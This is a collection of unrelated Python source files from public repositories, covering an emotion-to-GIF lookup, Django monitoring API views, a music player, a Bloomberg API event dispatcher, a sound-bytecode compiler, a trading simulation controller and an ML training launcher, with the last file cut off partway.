'https://eastus.api.cognitive.microsoft.com/face/v1.0/detect?'\n# file url of face to examine goes here: \nimage_url = 'https://manofmany.com/wp-content/uploads/2020/02/How-to-make-yourself-stop-being-angry-in-60seconds.jpg'\n# add key to headers to get authorization\nheaders = {'Ocp-Apim-Subscription-Key': KEY}\n# only return emotion attribute in response\nparams = {\n 'returnFaceId': 'true',\n 'returnFaceLandmarks': 'false',\n 'returnFaceAttributes': 'emotion',\n}\n\n# make POST request and store response in response variable\nresponse = requests.post(face_api_url, params=params, headers=headers, json={\"url\": image_url})\n\n# extract json information until left with dictionary of emotions with corresponding values\ndata = response.json()\nfaceEmotion = data[0]['faceAttributes']\nemotionDict = faceEmotion['emotion']\n\n# get the emotion with the maximum value and store in clearestEmotion variable\nclearestEmotion = max(emotionDict.items(), key=operator.itemgetter(1))[0]\n\n\n# Set Up GIPHY API connection\ngiphyKey = config.giphyApiKey\ngiphySearchEndpoint = 'api.giphy.com/v1/gifs/search'\ndata = json.loads(urllib.urlopen(\"http://api.giphy.com/v1/gifs/search?q=\" + clearestEmotion + \"&api_key=giphyKey&limit=15\").read())\n\n","repo_name":"rhodesrm/EmotionSense","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20548461490","text":"from rest_framework.decorators import api_view\nfrom api.serializers import GroupSerializer, AppSerializer, host_serializer,\\\n app_history_serializer, app_statistics_serializer, manager_app_serializer\nfrom api.models import Group, App, Host, AppStatistics, AppHistory\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse, HttpResponse\nfrom api.lib.utils import object_to_json, RepresentsInt, api\nfrom ipware.ip import get_ip\nfrom datetime import datetime\nimport json\nfrom api.lib.constant import MonitoringStatus\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef group_list(request):\n \"\"\"\n List all gourps, or create a new group.\n \"\"\"\n if request.method == 'GET':\n tasks = Group.objects.all()\n serializer = GroupSerializer(tasks, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n unique_name = request.data.get(\"unique_name\")\n display_name = request.data.get(\"display_name\")\n if unique_name and display_name:\n checkgoup = Group.objects.filter(unique_name=unique_name).first()\n if checkgoup:\n res = {\"code\": 400,\n \"message\": \"Ops!, Unique name already exists\"}\n return Response(data=res,\n status=400)\n else:\n res = {\"code\": 400,\n \"message\":\n \"Ops!, Unique name and display name can't be null\"}\n return Response(data=res,\n status=400)\n group = Group.create(unique_name, display_name)\n group.save()\n serializer = GroupSerializer(group, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET', 'PUT'])\ndef group_detail(request, pk):\n \"\"\"\n Get, udpate, or delete a specific task\n \"\"\"\n try:\n group = Group.objects.get(pk=pk)\n except Group.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = GroupSerializer(group)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n group.unique_name = request.data.get(\"unique_name\", group.unique_name)\n group.display_name = request.data.get(\"display_name\",\n group.display_name)\n group.save()\n return JsonResponse(object_to_json(group))\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef app_list(request):\n\n if request.method == 'GET':\n groupid = request.GET.get('groupid', None)\n if groupid:\n tasks = App.objects.filter(enable=1).filter(group_id=groupid).all()\n else:\n tasks = App.objects.filter(enable=1).all()\n serializer = AppSerializer(tasks, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n name = request.data.get(\"name\", None)\n app = App.create(name, 1, \"OK\", \"\", 1, 2).save()\n serializer = AppSerializer(app, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@csrf_exempt\ndef app_detail(request, pk):\n try:\n try:\n pk = int(pk)\n app = App.objects.get(pk=pk)\n except:\n app = App.objects.filter(name=pk).first()\n except Group.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = AppSerializer(app)\n return JsonResponse(serializer.data)\n\n if request.method == 'DELETE':\n app.enable = 0\n app.save()\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n if not app:\n res = {\"code\": 405, \"message\": \"Not found this app\"}\n return Response(data=res,\n status=405)\n ip = get_ip(request, right_most_proxy=True)\n if ip is not None:\n host = Host.objects.filter(ip=ip).first()\n if host is None:\n host = Host.create(ip)\n host.save()\n status = request.data.get(\"status\")\n statistics = request.data.get('statistics')\n app.message = request.data.get(\"message\", app.message)\n if status is None:\n res = {\"code\": 400,\n \"message\": \"wong\"}\n return Response(data=res, status=400)\n app.status = status\n app.last_update = datetime.now()\n app.host_id = host.id\n app.save()\n if statistics:\n try:\n json.loads(statistics)\n except:\n res = {\"code\": 400, \"message\": \"Statistics format must json\"}\n return Response(data=res,\n status=400)\n appStatistics = AppStatistics.create(statistics, app.id)\n appStatistics.save()\n return JsonResponse(object_to_json(app))\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef manager_detail(request, pk):\n try:\n pk = int(pk)\n app = App.objects.get(pk=pk)\n except:\n app = App.objects.filter(unique_name=pk).first()\n if not app:\n return HttpResponse(status=404)\n elif request.method == 'GET':\n serializer = manager_app_serializer(app)\n return JsonResponse(serializer.data)\n\n elif request.method == 'POST':\n app.name = request.data.get(\"name\", app.name)\n app.host_id = request.data.get(\"host_id\", app.host_id)\n app.group_id = request.data.get(\"group_id\", app.group_id)\n app.configuration = request.data.get(\"configuration\", app.configuration)\n app.save()\n serializer = manager_app_serializer(app, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\ndef host_list(request):\n \"\"\"List all code hosts\n :rtype: json\n \"\"\"\n hosts = Host.objects.all()\n serializer = host_serializer(hosts, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\n@api_view(['GET', 'PUT'])\ndef host_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a code host.\n \"\"\"\n try:\n host = Host.objects.get(pk=pk)\n except Group.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = host_serializer(host)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n host.name = request.data.get(\"name\", host.name)\n host.description = request.data.get(\"description\", host.description)\n host.save()\n return JsonResponse(object_to_json(host))\n\n\n@api_view(['GET'])\ndef app_history_list(request):\n if request.method == 'GET':\n limit = request.GET.get('limit', 12)\n appid = request.GET.get('appid')\n if not RepresentsInt(limit):\n res = {\"code\": 404, \"message\": \"Limit must be int\"}\n return Response(data=res,\n status=400)\n else:\n limit = int(limit)\n if not RepresentsInt(appid):\n res = {\"code\": 400, \"message\": \"Appid must be int\"}\n return Response(data=res,\n status=400)\n apphistory_list = AppHistory.objects.filter(app_id=appid).order_by('-id')[:limit]\n serializer = app_history_serializer(apphistory_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\ndef app_statistics_list(request, pk):\n limit = int(request.GET.get('limit', 12))\n start_date = request.GET.get('startDate', None)\n end_date = request.GET.get('endDate', None)\n if start_date and end_date:\n appstatistics_list = AppStatistics.objects.filter(app_id=pk).filter(time__range=(start_date, end_date)).order_by('-id').all()\n else:\n appstatistics_list = AppStatistics.objects.filter(app_id=pk).order_by('-id')[:limit].all()\n serializer = app_statistics_serializer(appstatistics_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\n@api\ndef count_groups_statistics_detail(request):\n grouplist = Group.objects.all().filter()\n group_message = []\n for group in grouplist:\n group_apps = App.objects.filter(group_id=group.id).filter(enable=1).all()\n ok_num = 0\n warn_num = 0\n critical_num = 0\n for app in group_apps:\n if app.status == MonitoringStatus.OK:\n ok_num += 1\n elif app.status == MonitoringStatus.WARN:\n warn_num += 1\n elif app.status == MonitoringStatus.CRITICAL:\n critical_num += 1\n group_app = {\"id\": group.id,\n \"uniqueName\": group.unique_name,\n \"displayName\": group.display_name,\n \"statistics\": {\"total\": len(group_apps),\n MonitoringStatus.OK.lower(): ok_num,\n MonitoringStatus.CRITICAL.lower(): critical_num,\n MonitoringStatus.WARN.lower(): warn_num,\n }\n }\n group_message.append(group_app)\n return group_message\n\n\n@api_view(['GET'])\n@api\ndef count_group_statistics_detail(request, pk):\n group = Group.objects.filter(id=pk).first()\n if group is None:\n res = {\"code\": 400, \"message\": \"Ops!, Don't find group by this id\"}\n return Response(data=res,\n status=400)\n group_apps = App.objects.filter(group_id=group.id).filter(enable=1).all()\n ok_num = 0\n warn_num = 0\n critical_num = 0\n for app in group_apps:\n if app.status == MonitoringStatus.OK:\n ok_num += 1\n elif app.status == MonitoringStatus.WARN:\n warn_num += 1\n elif app.status == MonitoringStatus.CRITICAL:\n critical_num += 1\n group_app = {\"id\": group.id,\n \"uniqueName\": group.unique_name,\n \"displayName\": group.display_name,\n \"statistics\": {\"total\": len(group_apps),\n MonitoringStatus.OK.lower(): ok_num,\n MonitoringStatus.CRITICAL.lower(): critical_num,\n MonitoringStatus.WARN.lower(): warn_num,\n }\n }\n return group_app\n","repo_name":"zjstrive/smallmonitor","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10245,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"8002258449","text":"import pygame\r\nimport tkinter\r\nfrom tkinter.filedialog import askdirectory\r\nimport os\r\n\r\nplayer = tkinter.Tk()\r\nplayer.title(\"Music Player\")\r\nplayer.geometry(\"310x325\")\r\n\r\nvar = tkinter.StringVar()\r\nvar.set(\"Select the song to play\")\r\n\r\nos.chdir(askdirectory())\r\nsonglist = os.listdir()\r\n\r\nplaying = tkinter.Listbox(player,font=\"Helvetica 12 bold\",width=28,bg=\"black\",fg=\"white\",selectmode=tkinter.SINGLE)\r\n\r\nfor item in songlist:\r\n playing.insert(0,item)\r\n\r\npygame.init()\r\npygame.mixer.init()\r\n\r\ndef play():\r\n pygame.mixer.music.load(playing.get(tkinter.ACTIVE))\r\n name = playing.get(tkinter.ACTIVE)\r\n var.set(f\"{name[:16]}...\" if len(name)>18 else name)\r\n pygame.mixer.music.play()\r\n\r\ndef pause():\r\n pygame.mixer.music.pause()\r\n\r\ndef resume():\r\n pygame.mixer.music.unpause()\r\n\r\ntext = tkinter.Label(player,font=\"Helvetica\",textvariable=var).grid(row=0,columnspan=3)\r\nplaying.grid(columnspan=3)\r\n\r\nplayB = tkinter.Button(player,width=7,height=1,font=\"Helvetica\",text=\"Play\",command=play,bg=\"lightgreen\").grid(row=2,column=0)\r\npauseB = tkinter.Button(player, width=7, height=1, font=\"Helvetica\", text=\"Pause\", command=pause, bg=\"lightblue\", fg=\"black\").grid(row=2,column=1)\r\nresumeB = tkinter.Button(player, width=9, height=1, font=\"Helvetica\", text=\"Resume\", command=resume, bg=\"lightpink\", fg=\"black\").grid(row=2,column=2)\r\n\r\nplayer.mainloop()","repo_name":"Navneety007/MusicPlayer","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"3324945624","text":"# eventdispatcher.py\n\n\"\"\"Provide a dispatcher to dispatch events.\n\nThis component implements a dispatcher to dispatch events from one or more\nSessions through callbacks.\n\"\"\"\n\nimport warnings\nfrom . import internals\nfrom .chandle import CHandle\n\n\nclass EventDispatcher(CHandle):\n \"\"\"Dispatches events from one or more Sessions through callbacks\n\n :class:`EventDispatcher` objects are optionally specified when Session\n objects are created. A single :class:`EventDispatcher` can be shared by\n multiple Session objects.\n\n The :class:`EventDispatcher` provides an event-driven interface, generating\n callbacks from one or more internal threads for one or more sessions.\n \"\"\"\n\n __handle = None # pylint: disable=unused-private-member\n\n def __init__(self, numDispatcherThreads: int = 1) -> None:\n \"\"\"Construct an :class:`EventDispatcher`.\n\n Args:\n numDispatcherThreads: Number of dispatcher threads\n\n If ``numDispatcherThreads`` is ``1`` (the default) then a single\n internal thread is created to dispatch events. If\n ``numDispatcherThreads`` is greater than ``1`` then an internal pool of\n ``numDispatcherThreads`` threads is created to dispatch events. The\n behavior is undefined if ``numDispatcherThreads`` is ``0``.\n \"\"\"\n selfhandle = internals.blpapi_EventDispatcher_create(\n numDispatcherThreads\n )\n super(EventDispatcher, self).__init__(\n selfhandle, internals.blpapi_EventDispatcher_destroy\n )\n self.__handle = selfhandle\n\n def start(self) -> int:\n \"\"\"Start generating callbacks for events from sessions associated with\n this :class:`EventDispatcher`.\n \"\"\"\n\n return internals.blpapi_EventDispatcher_start(self.__handle)\n\n def stop(self, async_: bool = False, **kwargs: bool) -> int:\n \"\"\"Stop generating callbacks.\n\n Args:\n async\\_ : Whether to execute this method asynchronously\n\n Stop generating callbacks for events from sessions associated with this\n :class:`EventDispatcher`. If the specified ``async_`` is ``False`` (the\n default) then this method blocks until all current callbacks which were\n dispatched through this :class:`EventDispatcher` have completed. If\n ``async_`` is ``True``, this method returns immediately and no further\n callbacks will be dispatched.\n\n Note:\n If stop is called with ``async_`` of ``False`` from within a\n callback dispatched by this :class:`EventDispatcher` then the\n ``async_`` parameter is overridden to ``True``.\n \"\"\"\n\n if \"async\" in kwargs:\n warnings.warn(\n \"async parameter has been deprecated in favor of async_\",\n DeprecationWarning,\n )\n async_ = kwargs.pop(\"async\")\n\n if kwargs:\n raise TypeError(\n \"EventDispatcher.stop() got an unexpected keyword \"\n \"argument. Only 'async' is allowed for backwards \"\n \"compatibility.\"\n )\n\n return internals.blpapi_EventDispatcher_stop(self.__handle, async_)\n\n\n__copyright__ = \"\"\"\nCopyright 2012. Bloomberg Finance L.P.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions: The above\ncopyright notice and this permission notice shall be included in all copies\nor substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n\"\"\"\n","repo_name":"msitt/blpapi-python","sub_path":"src/blpapi/eventdispatcher.py","file_name":"eventdispatcher.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"27"} +{"seq_id":"11535589486","text":"'Compile Dosound DSL scripts to bytecode for playback on a real Atari.'\nfrom functools import reduce\nimport operator, sys\n\nclass Reg:\n\n def __init__(self, data, index, xform):\n self.data = data\n self.index = index\n self.xform = xform\n\n def put(self, *value):\n self.data.bytecode.extend([self.index, self.xform(*value)])\n\n def anim(self, preadjust, last):\n self.data.bytecode.extend([0x81, self.index, preadjust & 0xff, last])\n # If prev equals last we do a full cycle rather than nothing, see dosound0:\n value = self.data.prev\n while True:\n value = (value + preadjust) & 0xff\n self.data.totalticks += 1\n if value == last or value == self.data.prev:\n break\n\nclass UnsupportedTicksException(Exception): pass\n\nclass Data:\n\n def __init__(self):\n self.index = 0\n self.totalticks = 0\n self.bytecode = []\n\n def reg(self, xform = lambda x: x):\n r = Reg(self, self.index, xform)\n self.index += 1\n return r\n\n def setprev(self, prev):\n self.bytecode.extend([0x80, prev])\n self.prev = prev\n\n def sleep(self, ticks):\n if ticks < 2:\n raise UnsupportedTicksException(ticks)\n while ticks:\n part = min(256, ticks)\n self.bytecode.extend([0x82, part - 1])\n self.totalticks += part\n ticks -= part\n\n def save(self, f):\n w = lambda v: f.write(bytes(v))\n w([self.totalticks >> 8, self.totalticks & 0xff])\n w(self.bytecode)\n w([0x82, 0])\n\nclass Globals:\n\n def __init__(g, data):\n g.A_fine, g.A_rough, g.B_fine, g.B_rough, g.C_fine, g.C_rough, g.N_period = (data.reg() for _ in range(7))\n g.mixer = data.reg(lambda *v: 0x3f & ~reduce(operator.or_, v, 0))\n g.A_level, g.B_level, g.C_level, g.E_fine, g.E_rough, g.E_shape = (data.reg() for _ in range(6))\n g.A_tone, g.B_tone, g.C_tone, g.A_noise, g.B_noise, g.C_noise = (0x01 << i for i in range(6))\n g.setprev = data.setprev\n g.sleep = data.sleep\n\ndef main():\n for inpath in sys.argv[1:]:\n outpath = inpath[:inpath.rindex('.')] + '.dsd'\n print(outpath, file=sys.stderr)\n data = Data()\n exec(compile(open(inpath).read(), inpath, 'exec'), Globals(data).__dict__)\n with open(outpath, 'wb') as f:\n data.save(f)\n\nif '__main__' == __name__:\n main()\n","repo_name":"combatopera/pym2149","sub_path":"ymtests/mkdsd.py","file_name":"mkdsd.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"885785253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 30 16:27:03 2023\n\n@author: 84752\n\"\"\"\n\n\n\nfrom multiprocessing import Process, Queue\n#from marketDataService import MarketDataService\nfrom exchangeSimulator import ExchangeSimulator\nimport threading\nfrom quantTradingPlatform import TradingPlatform\nfrom MarketDataServer import MarketDataService_Stock, MarketDataService_Future\nfrom QuantStrategy import QuantStrategy\n\nif __name__ == '__main__':\n ###########################################################################\n # Define all components\n ###########################################################################\n '''#for calculating information of all 10 stocks portfolio\n fTicker_lis = ['JBF1', 'QWF1', 'HCF1', 'DBF1', 'EHF1', 'IPF1', 'IIF1', 'QXF1', 'PEF1', 'NAF1']\n sTicker_lis = ['3443','2388', '2498', '2610', '1319', '3035', '3006', '2615', '5425', '3105']'''\n '''#for calculating return for single stock\n fTicker_lis = ['DBF1']\n sTicker_lis = ['2610']'''\n #Our final selection of 3-stock portfolio\n fTicker_lis = ['EHF1', 'IPF1', 'IIF1']\n sTicker_lis = [ '1319', '3035', '3006']\n queue_lis = []\n strategy = QuantStrategy(\"1\", \"leading_lagging_effect\", \"Team 4\", \"Future_stock\", \"20230801\", fTicker_lis, sTicker_lis)\n for i in range(len(fTicker_lis)):\n mktData_string = '''marketData_2_platform_q_{} = Queue(); marketData_2_platform_q_{} = Queue()'''.format(sTicker_lis[i], fTicker_lis[i])\n exec(mktData_string)\n marketData_2_exchSim_q = Queue()\n \n \n platform_2_exchSim_order_q = Queue()\n exchSim_2_platform_execution_q = Queue()\n # stocks = ['1319','2388']#,'2498','2610','2615','3006','3035','3105','3443','5425']\n # futures = ['EHF1', 'QWF1']\n ### 方法1 \n s_md_thread_list = []\n f_md_thread_list = []\n for i in range(len(sTicker_lis)): #开启5个子进程执行fun1函数\n string = '''ts = threading.Thread(target=MarketDataService_Stock,args=(sTicker_lis[{}],marketData_2_exchSim_q, marketData_2_platform_q_{}))\ntf = threading.Thread(target=MarketDataService_Future,args=(marketData_2_exchSim_q, marketData_2_platform_q_{},fTicker_lis[{}],))\nts.start()\ntf.start()\ns_md_thread_list.append(ts)\nf_md_thread_list.append(tf)\n '''.format(i, sTicker_lis[i], fTicker_lis[i], i)\n exec(string)\n \n \n #Process(name='md', target=MarketDataService, args=(marketData_2_exchSim_q, marketData_2_platform_q, )).start()\n t2 = threading.Thread(name='sim', target=ExchangeSimulator, args=(marketData_2_exchSim_q, platform_2_exchSim_order_q, exchSim_2_platform_execution_q, ))\n t2.start()\n s_plat_thread_list = []\n f_plat_thread_list = []\n for i in range(len(sTicker_lis)): #开启5个子进程执行fun1函数\n string = '''ts_plat = threading.Thread(target=TradingPlatform,args=(marketData_2_platform_q_{},platform_2_exchSim_order_q,\n exchSim_2_platform_execution_q, strategy))\ntf_plat = threading.Thread(target=TradingPlatform,args=(marketData_2_platform_q_{},platform_2_exchSim_order_q,\nexchSim_2_platform_execution_q, strategy))\nts_plat.start()\ntf_plat.start()\ns_plat_thread_list.append(ts_plat)\nf_plat_thread_list.append(tf_plat)\n '''.format(sTicker_lis[i], fTicker_lis[i])\n exec(string)\n \n for i in range(len(s_md_thread_list)):\n s_md_thread_list[i].join()\n f_md_thread_list[i].join()\n t2.join()\n for i in range(len(s_plat_thread_list)):\n s_plat_thread_list[i].join()\n f_plat_thread_list[i].join()\n\n \n ","repo_name":"Joe-Bradley/Python_trading_platform","sub_path":"Code/systemController.py","file_name":"systemController.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24511622345","text":"import json\nfrom aiofiles import open\nimport os\n\n_path = os.path.dirname(os.path.realpath(__file__))\n\n\nasync def read_settings() -> (dict, dict):\n async with open(\"{path}/../../settings.json\".format(path=_path), \"r\", buffering=True) as settings_file:\n config_data = await settings_file.read()\n data: dict = json.loads(config_data)\n charge_point_info: dict = data[\"charge_point\"][\"info\"]\n hardware_info: dict = data[\"charge_point\"][\"hardware\"]\n await settings_file.close()\n return charge_point_info, hardware_info\n","repo_name":"xBlaz3kx/ChargePi","sub_path":"client/charge_point/data/settings_manager.py","file_name":"settings_manager.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"265420329","text":"\"\"\" test Imaging \"\"\"\n\nimport datetime\nimport unittest\n\nfrom pydantic import ValidationError\n\nfrom aind_data_schema.device import Calibration\nfrom aind_data_schema.imaging import acquisition as acq\nfrom aind_data_schema.imaging import instrument as inst\nfrom aind_data_schema.imaging import mri_session as ms\nfrom aind_data_schema.imaging import tile\nfrom aind_data_schema.manufacturers import Manufacturer\nfrom aind_data_schema.processing import Registration\nfrom aind_data_schema.utils.units import PowerValue\n\n\nclass ImagingTests(unittest.TestCase):\n \"\"\"test imaging schemas\"\"\"\n\n def test_constructors(self):\n \"\"\"testing constructors\"\"\"\n with self.assertRaises(ValidationError):\n a = acq.Acquisition()\n\n a = acq.Acquisition(\n experimenter_full_name=[\"alice\"],\n session_start_time=datetime.datetime.now(),\n specimen_id=\"12345\",\n subject_id=\"1234\",\n instrument_id=\"1234\",\n calibrations=[\n Calibration(\n calibration_date=datetime.datetime.now(),\n description=\"Laser power calibration\",\n device_name=\"Laser 1\",\n input={\"power_setting\": PowerValue(value=100.0, unit=\"percent\")},\n output={\"power_measurement\": PowerValue(value=50.0, unit=\"milliwatt\")},\n ),\n ],\n session_end_time=datetime.datetime.now(),\n chamber_immersion=acq.Immersion(medium=\"PBS\", refractive_index=1),\n tiles=[\n tile.AcquisitionTile(\n coordinate_transformations=[\n tile.Scale3dTransform(scale=[1, 1, 1]),\n tile.Translation3dTransform(translation=[1, 1, 1]),\n ],\n channel=tile.Channel(\n channel_name=\"488\",\n light_source_name=\"Ex_488\",\n filter_names=[\"Em_600\"],\n detector_name=\"PMT_1\",\n excitation_wavelength=488,\n excitation_power=0.1,\n filter_wheel_index=0,\n ),\n )\n ],\n axes=[],\n )\n\n assert a is not None\n\n with self.assertRaises(ValidationError):\n i = inst.Instrument()\n\n i = inst.Instrument(\n instrument_type=\"diSPIM\",\n modification_date=datetime.datetime.now(),\n manufacturer=Manufacturer.LIFECANVAS,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n assert i is not None\n\n with self.assertRaises(ValidationError):\n i = inst.Instrument(\n instrument_type=\"Other\",\n manufacturer=Manufacturer.OTHER,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n with self.assertRaises(ValidationError):\n i = inst.Instrument(\n instrument_type=\"diSPIM\",\n manufacturer=Manufacturer.OTHER,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n with self.assertRaises(ValidationError):\n mri = ms.MRIScan(\n scan_sequence_type=\"Other\",\n )\n\n with self.assertRaises(ValidationError):\n mri = ms.MRIScan(scan_sequence_type=\"Other\", notes=\"\")\n\n mri = ms.MriSession(\n experimenter_full_name=[\"Frank Frankson\"],\n subject_id=1234,\n session_start_time=datetime.datetime.now(),\n session_end_time=datetime.datetime.now(),\n protocol_id=\"doi_path\",\n animal_weight_prior=22.1,\n animal_weight_post=21.9,\n mri_scanner=ms.Scanner(\n scanner_location=\"UW SLU\",\n magnetic_strength=7,\n magnetic_strength_unit=\"T\",\n ),\n scans=[\n ms.MRIScan(\n scan_type=\"3D Scan\",\n scan_sequence_type=\"RARE\",\n primary_scan=True,\n axes=[\n acq.Axis(\n name=\"X\",\n dimension=2,\n direction=\"Left_to_right\",\n ),\n acq.Axis(\n name=\"Y\",\n dimension=1,\n direction=\"Anterior_to_posterior\",\n ),\n acq.Axis(\n name=\"Z\",\n dimension=0,\n direction=\"Inferior_to_superior\",\n ),\n ],\n voxel_sizes=tile.Scale3dTransform(scale=[0.01, 0.01, 0.01]),\n echo_time=2.2,\n effective_echo_time=2.0,\n repetition_time=1.2,\n additional_scan_parameters={\"number_averages\": 3},\n )\n ],\n )\n\n assert mri is not None\n\n def test_axis(self):\n \"\"\"test the axis class\"\"\"\n # test that a few work\n test_codes = [\"RAS\", \"LSP\", \"RAI\", \"PAR\"]\n for test_code in test_codes:\n axes = acq.Axis.from_direction_code(test_code)\n assert len(axes) == 3\n\n def test_registration(self):\n \"\"\"test the tile models\"\"\"\n\n t = Registration(\n name=\"Image tile alignment\",\n software_version=\"2.3\",\n start_date_time=datetime.datetime.now(),\n end_date_time=datetime.datetime.now(),\n input_location=\"/some/path\",\n output_location=\"/some/path\",\n code_url=\"http://foo\",\n parameters={},\n registration_type=\"Intra-channel\",\n tiles=[\n tile.Tile(\n coordinate_transformations=[\n tile.Affine3dTransform(affine_transform=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n ]\n ),\n tile.Tile(\n coordinate_transformations=[\n tile.Translation3dTransform(translation=[0, 1, 2]),\n tile.Rotation3dTransform(rotation=[1, 2, 3, 4, 5, 6, 7, 8, 9]),\n tile.Scale3dTransform(scale=[1, 2, 3]),\n ]\n ),\n ],\n )\n\n assert t is not None\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"AllenNeuralDynamics/aind-data-schema","sub_path":"tests/test_imaging.py","file_name":"test_imaging.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"13117847405","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# author:Administrator\r\n# datetime:2019/1/26 17:02\r\n# software: PyCharm\r\nimport requests\r\nsession=requests.session()\r\ndate_list=[{\"moblienum\":\"17868871347\"},\r\n {\"moblienum\":\"\"},\r\n {\"moblienum\":\"None\"},\r\n {\"moblienum\":\"1786887134711\"}]\r\nfor i in date_list:\r\n resp=session.post(\"http://api.avatardata.cn/MobilePlace/LookUp\",i)\r\n print(resp.text)\r\n if resp.status_code==200:\r\n print(\"ceshi\")\r\n reat=resp.json()\r\n if i[\"moblienum\"]==\"17868871347\"and reat[\"error_code\"]==0 and reat[\"reason\"]==\"Succes\":\r\n print(\"测试成功\")\r\n elif i[\"moblienum\"]!=\"17868871347\"and reat[\"error_code\"]==1:\r\n print(\"测试成功\")\r\n else:\r\n print(\"测试失败\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"RedAnanas/macbendi","sub_path":"date20190126/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36206262742","text":"import argparse\nfrom config_loader.config import get_config\nfrom trainer.trainer import train\nfrom utils.parser_helper import str2bool\nimport os\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nparser.add_argument('--freeze_bert', type=str2bool, default=None)\nparser.add_argument('--freeze_cnn', type=str2bool, default=None)\nparser.add_argument('--batch', type=int, default=None)\nparser.add_argument('--device', type=str, default='cuda')\nparser.add_argument('--experiment_name', type=str, default=None)\nparser.add_argument('--lr', type=float, default=None)\n\nargs = parser.parse_args()\nconfig_path = args.config\nfreeze_bert = args.freeze_bert\nfreeze_cnn = args.freeze_cnn\nbatch_size = args.batch\nlr = args.lr\nexperiment_name = args.experiment_name\ndevice = args.device\nconfig = get_config(config_path)\nif batch_size is not None:\n config.training.batch_size = args.batch\nif freeze_bert is not None:\n config.bert.freeze_bert = freeze_bert\nif freeze_cnn is not None:\n config.encoder.freeze_cnn = freeze_cnn\nif lr is not None:\n config.optimizer.lr = lr\nif experiment_name is not None:\n config.experiment.name = experiment_name\nconfig.experiment.name = \"{}-LR{}\".format(config.experiment.name, config.optimizer.lr)\n\ntrain(config, device)","repo_name":"liuxubo717/cl4ac","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"27"} +{"seq_id":"74916234630","text":"\"\"\"A Script to create and delete slash commands.\"\"\"\nimport os\nimport requests\n\n\nslash_color = lambda: make_request(\n endpoint=\"commands\",\n json={\n \"name\": \"color\",\n \"description\": \"Identify and display a color that you choose\",\n \"options\": [\n {\n \"name\": \"color\",\n \"description\": \"The color you'd like to identify, in any format\",\n \"type\": 3,\n \"required\": True,\n },\n ],\n 